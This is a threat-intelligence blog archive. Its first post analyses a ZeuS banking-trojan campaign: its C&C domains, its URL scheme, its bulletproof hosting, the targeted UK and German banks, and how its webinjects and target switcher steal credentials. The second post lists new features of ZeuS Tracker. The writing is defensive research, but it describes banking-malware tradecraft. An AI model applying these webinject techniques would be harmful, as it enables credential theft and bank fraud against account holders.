Category Archives: ZeuS Tracker

The Bozvanovna ZeuS Botnet

This week I’ve taken the opportunity to take a closer look at the current ZeuS campaigns. A few of them keep popping up again and again, so I’ve tried to get some more information about those botnets, their targets as well as the infrastructure that the cybercriminals are using.

In this first blog post I will talk about a ZeuS botnet which I call the “Bozvanovna Botnet”, which is being spread using drive-by exploits (hopefully I will find the time to blog about the other botnets that I’ve found too…).

First of all, let’s take a look at the botnet Command&Control infrastructure: The cybercriminals have registered a pretty big amount of domains to serve ZeuS configs and binaries as well as to provide a dropzone for the infected clients (bots) to upload the stolen information. The reason for this is pretty simple: In most cases the domains that get listed on ZeuS Tracker will get nuked quickly. Then the cybercriminals have to register new domains every time the old domains get suspended.

Below is a list of the domains that were associated with the Bozvanovna Botnet and that ZeuS Tracker came across of:

Firstseen Domain Registrar Registrant A record Status
2010-10-18 DIRECTI Anton Petushkov Suspended
2010-10-30 REGTIME Andrey Aleksandrovich Polev Suspended
2010-10-29 REGTIME Andrey Aleksandrovich Polev Suspended
2010-11-05 REGTIME Anton Petushkov Suspended
2010-11-07 REGTIME SP3 LTD Suspended
2010-11-22 DIRECTI Annamos Susdanil Suspended
2010-11-22 DIRECTI Petr Klimov Suspended
2010-11-25 DIRECTI SP3 LTD Suspended
2010-11-28 DIRECTI SP3 LTD Suspended
2010-11-28 DIRECTI Saoma LTD Suspended
2010-11-28 DIRECTI Saoma LTD Suspended
2010-11-16 REGTIME Maksim A Roslyakov Inactive
2010-11-22 REGTIME Maksim A Roslyakov Suspended
2010-11-22 REGTIME Maksim A Roslyakov Suspended
2010-11-27 DIRECTI Saoma ltd Suspended
2010-11-28 DIRECTI SP3 LTD Suspended
2010-12-05 REGTIME Maksim A Roslyakov Suspended
2010-12-06 REGTIME Max Pet Inactive
2010-12-08 REGTIME Evgeniy Jaakson Active
2010-12-08 REGTIME Evgeniy Jaakson Active
2010-12-10 DIRECTI Suspended
2010-12-10 DIRECTI Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 DIRECTI Alexander Fulop Suspended
2010-12-13 REGTIME Aaltonen Alexander Active
2010-12-13 REGTIME Aaltonen Alexander Active
2010-12-13 DIRECTI Suspended
2010-12-14 DIRECTI Alexander Fulop Suspended
2010-12-16 DIRECTI Alexander Fulop Suspended
2010-12-16 REGTIME Evgeniy Jaakson Active
2010-12-17 REGTIME Aaltonen Alexander Active
2010-12-17 REGTIME Aaltonen Alexander Active
2010-12-17 REGTIME Evgeniy Jaakson Active
2010-12-19 DIRECTI Suspended

The first domain popped up on 2010-10-18, but it looks like the Bozvanovna gang has been operating at least since July 2010. Fortunately, it’s pretty easy to detect those domains that are associated with that specific botnet, because in most of the cases they are using the same URL scheme:

  • ZeuS Config file:
  • ZeuS Binary file: 000XYYY.exe
  • ZeuS Dropzone: i.php

Where X is an alphabetic letter (eg n or x) and Y a numeric character (eg 2 or 123).

Another point which pops up when we take a look at the list above is that most of the domains are hosted at a well known bulletproof hosting provider named VolgaHost and is located in Russia:

As number: AS29106
AS name: VolgaHost
ZeuS C&Cs:
Spamhaus SBL:
CIDR Report:

According to CIDR Report, VolgaHost is being routed through AS39307 – DCOMM-UA-AS Digital Communications Ltd. Both ASs can be considered 100% malicious and should therefore not be routed. But let’s get back to the Bozvanovna botnet…

When I took a look at the ZeuS config files of the Bozvanovna botnet (they are using ZeuS version, I was really surprised as I saw how many financial instutions they are targeting. Below is a list of the targets of this ZeuS campaign which I’ve seen so far:

  • NatWest
  • HSBC
  • Nationwide
  • Lloyds TSB
  • Co-operative bank
  • Bank of Scotland
  • Yorkshire Bank
  • Halifax
  • Postbank
  • Sparkasse
  • Barclays
  • Commerzbank

Like most ZeuS campaigns, the Bozvanovna botnet is also using so-called Webinjects to phish credentials and steal money from the victims online bank account. The Bozvanovna botnet is using different Webinjects, some of them are implemented in the ZeuS config file and some of them are hosted on a server on the internet (to generate webinjects dynamically). In total I’ve seen two domains which are being used to implement the webinjects:

Domain Registrar Registrant A record AS number AS name REGTIME Lubov Bozvanovna AS23352 Server Central Network REGTIME Aaltonen Alexander AS55720 GIGABIT-MY

Both domain names are currently active and what is even more interesting: Both domain names are using HTTPS with a valid certificate. This is actually not that uncommon: A lot of the recent ZeuS campaigns I’ve seen are using valid SSL certificates to avoid browser warnings on the client side during the ebanking session.

Bozvanovna SSL certificate

Bozvanovna SSL certificate

The webinjects as well as the server side scripts are (as in most of the cases) pretty complex. What I’ve seen in the Bozvanovna ZeuS campaign is that they can switch the targets of their interest pretty easily by using some kind of switcher to turn the campaign targeting a special bank on or off. Therefore they have defined a lot webinjects in the ZeuS config file for a lot of differnet financial institutions. As soon as they want to activate a campaign, they just have to change the switcher on the webinject server to on (by using this switcher they don’t have to change the config file every time they want to change the targets of their campaign). Let take a look at a target in the ZeuS config file of Bozvanovna:

Webinject Bozvanovna

The Target URL defines the target of this Webinject. The cybercriminal can then define at which point of the online banking site they want to replace or insert code (data_before / data_after). In this example ZeuS will add a lot of HTML- and Javascript code (data_inject) after the head-tag. What is interesting in this example is that the victims browser will load additional code from using java script. As already mentioned before you see that they are using HTTPS to load that code from

If we take a look at this URL referenced in the ZeuS config file, we will see the following content:

var current_state = “offline”;

It looks like the cybercriminals have disable the phishing campaign against this target, but they can change that pretty easily:

Bozvanonvna Webinject Status

If we now take another look at the same URL again, we will see that there is now a lot of HTML code being served from and injected into the online banking session of the victim:

Activated Webinject

What we see on the code snippet above is that the phishing campaign against this target is now active. ZeuS will now phish the credentials for the online bank account and display the error message “We have problem with online service. Try again later, sorry for any inconvenience” to the victim.

We have seen that the webinjects are pretty complex. So we have to ask ourselves: Is this really going to work? I can tell you: yes it is! Below is a screenshot of a log which is generated by the webinject backend:

Bozvanovna Victims

Click to enlarge

The log file is huge and contains information about:

  • Timestamp
  • Victims IP address
  • Victims Bank
  • User Agent (Browser)
  • Customer Number (Account number)
  • Memorable Data
  • Passnumber
  • Available amount of cash

You can also see that some of the victims are using Firefox. So you can even be targeted by such phishing attacks when you are using Firefox for your online banking sessions. Another interesting point in the logfiles are the timestamps: They have attacked the Nationet Internet Banking from October 14th to October 21th. Afterwards it seems that they have stopped the phishing campaign against this bank for some time by turning of the switcher (about which I have talked before). Since December 17th they are targeting the bank again.

But there is one fact that scares me much more than anything else: I saw a couple of victims which have logged in to their online banking account which are tagged as Business or Corporate online. When I do a whois on the victims IPs I saw that these IPs belongs to corporate customers within Europe. In fact this means that the cybercriminals are also targeting business customer and therefore they have access to a lot of money (you can imagine that there is more money on a business bank account than on a bank account of a private customer).

If we look at the admin panel of the server which is hosting the webinjects, we see that the cybercriminals have already grabbed a lot of information about the bank accounts of their victims. Below is just a very small screenshot of the admin panel (called personal room) on

Bozvanovna Admin Panel

The bank account which I’ve outlined in the screenshot above currently has a balance of 371’535.26 pounds. And now imagine: The entry table has 600 bank accounts listed! So there is a lot of money on those accounts….

Finally, let’s take a short look at the Bozvanovna botnet. Fortunately I had the chance to sinkhole a handfull domains which are associated with the Bozvanovna botnet and which are being used to control the botnet. Therefore I’m able to provide some information about the Bozvanovna botnet geo location:

Bozvanovna Botnet Geolocation

As shown in the pie chart above, most infected clients are located in Great Britain (GB) and Germany (DE). That’s not really surprising, because the financial institutions targeted by the Bozvanovna ZeuS campaign are mainly located in those countries.

*** Conclusion ***
While ZeuS and Spyeye obviously merged some months ago, we can see that ZeuS is still around (at least for now). The Bozvanovna ZeuS campaign is a good example on how sophisticated and complex the attacks on finanical insitutions are today.

If you want to mitigate the ZeuS threat in your network, I recommend you use one of ZeuS Tracker blocklists:

Follow me on Twitter:

ZeuS Tracker Online Again With New Features

As most of you probably noticed, ZeuS Tracker was offline for a whole week (2010-09-03 to 2010-09-14). During this time I made several improvements and added new features to ZeuS Tracker.

But before I go on with the list of new features, I would like to point your attention to another topic:

I’m currently working on a new project which should help operators of large networks (like ISPs, governmental organizations and NGOs) to mitigated bad traffic in their network. The project is currently in BETA and I’m searching for administrators which have the possibility to test the functions of the new project in a test network environment. Unfortunately I’m currently not able to disclose more information about the new project. If you are a network operator of a large network and you willing to support, please contact me using the contact form.

Back to the main topic: Below is a list of new features on ZeuS Tracker.

New features

  • ZT now records the time how long a ZeuS host is up (uptime)
  • ZeuS Tracker now tracks FakeURLs used by the ZeuS Crimeware
  • The monitor page now displays the HTTP status code returned by the ZeuS URLs (200, 404 etc)
  • If available, the monitor page displays the hostname for a ZeuS host
  • Added Virustotal support for ZeuS binaries
  • ZT now provides the Builder versions with which the ZeuS config files have been created
  • Added Google Maps to the ZT IP page
  • Added IP- and domain blocklist for Squid, iptables and Windows Host file


  • ZeuS Tracker cron script has been fully rewritten
  • The cron script now runs in threaded mode (faster in checking ZeuS hosts)
  • Statistic page now displays some additional statistics (Spamhaus SBL stats, Builder versions etc).

Additionally, I’ve made a huge ZeuS Tracker database cleanup and removed old and non-resolving hosts.

Automated binary submissions to the AV industry

ZeuS Tracker now supports the AV industry by submitting new ZeuS binaries to the AV vendors as soon as they appear on the ZeuS Tracker. I’ve made special agreements with some of the AV vendors listed below which have give the ZeuS Tracker direct access to their Sandbox systems. Some of the AV vendors are doing a great job which makes it possible that a new pattern is being released just a few minutes after ZT submitted the binary to the sandbox (using reputation based detection systems).

Currently, the following AV vendors receive a real time binary feed from ZeuS Tracker:

  • Avast
  • AVG
  • Avira
  • CA
  • Comodo
  • BitDefender
  • Emsisoft
  • Eset
  • eSafe
  • Finjan
  • Fortinet
  • G-Data
  • Ikarus
  • Kaspersky
  • Prevx
  • Sunbelt
  • F-Secure
  • McAfee
  • Norman
  • Panda
  • Rising
  • Sophos
  • Spybot
  • Symantec
  • Trend Micro

I hope you enjoy the new features of ZeuS Tracker!

PS: I’m currently searching a sponsorship for a SSL certificate for the ZeuS Tracker. If you are able to provide a SSL Certificate to ZeuS Tracker I would love if you contact me using the contact form. Any help would be appreciated!